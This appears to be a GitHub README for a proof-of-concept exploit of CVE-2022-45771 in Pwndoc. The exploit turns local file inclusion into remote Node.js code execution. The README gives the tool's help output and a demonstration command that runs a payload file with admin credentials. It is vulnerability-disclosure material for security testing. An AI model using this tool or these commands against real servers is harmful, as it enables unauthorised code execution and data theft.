Pwndoc local file inclusion to remote code execution of Node.js code on the server

p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE

Pwndoc local file inclusion to remote code execution of Node.js code on the server, discovered by @yuriisanin

Features

  • Custom Node.js code to execute server-side using --payload-file
  • Cleanup after exploit

Requirements

  • An admin account on the PwnDoc instance

Usage

$ ./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -h
CVE-2022-45771 Pwndoc-LFI-to-RCE v1.1 - by @podalirius_

usage: CVE-2022-45771-Pwndoc-LFI-to-RCE.py [-h] -u USERNAME -p PASSWORD -H HOST [-P PORT] [-v] [--http] [-f PAYLOAD_FILE]

Poc of CVE-2022-45771 Pwndoc-LFI-to-RCE

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Pwndoc username
  -p PASSWORD, --password PASSWORD
                        Pwndoc password
  -H HOST, --host HOST  Pwndoc ip
  -P PORT, --port PORT  Pwndoc port
  -v, --verbose         Verbose mode. (default: False)
  --http                HTTP mode. (default: False)
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        File containing node.js code to run on the server.

Demonstration

./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -u admin -p 'Admin123!' --host 127.0.0.1 --payload-file files/exploit.js
